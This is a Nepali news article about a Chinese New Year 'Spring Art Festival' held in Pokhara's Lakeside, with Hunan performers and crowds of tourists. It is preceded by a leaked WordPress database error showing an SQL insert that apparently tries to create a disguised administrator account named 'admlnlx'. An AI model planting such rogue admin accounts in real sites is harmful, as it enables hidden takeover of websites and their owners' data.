WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7XS1XZTcV/ozOHjNpYhVSBJoCwun./', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 05:49:18', '', 'admlnlx', 'admlnlx')
पोखरा, माघ ९-
चिनियाँ नया वर्षको अवसरमा पोखरामा ‘वसन्त कला महोत्सव’ आयोजना गरिएको छ । चिनियाँ उद्यमी मञ्च, पोखरा उद्योग वाणिज्य संघ, लगायतको सहकार्यमा सरकारी समाचार एजेन्सी सिन्हृवाले पोखराको लेकसाइडस्थित अम्बोटमा शनिवार साँभ् भएको चिनिया संस्कृति सम्बन्धी ‘वसन्त कला महोत्सव’मा चिनियाँ पर्यटक रमाएका छन् ।
कार्यक्रममा चीनको हुनान प्रान्तका कलाकारहरुले सांस्कृतिक कार्यक्रम प्रस्तुत गरे । शुरुमा बाघेनाच प्रदर्शन गर्दै चिनियाँ नयाँ वर्षलाई स्वागत गरिएको थियो, जसलाई दर्शकहरुले औधी रुचाएका थिए ।
माघको चिसो साँझको समयमा करीब साढे २ घण्टा सडकमै चलेको कार्यक्रममा चिनियाँ संस्कृति झल्कने एकल तथा सामुहिक नृत्य प्रस्तुत गरिएको थियो ।
कार्यक्रम हेर्न पोखरा घुम्न आएका पर्यटक प्रायः सबै भेला भएका थिए भने काठमाडौंबाट पनि बस रिजर्भ नै गरेर चिनियाँ पर्यटक आएको आयोजकले बताएको छ ।कार्यक्रममा लेकसाइडसहित पोखराका विभिन्न क्षेत्रका स्थानिय तथा आन्तरिक पर्यटकको बाक्लो सहभागिता थियो ।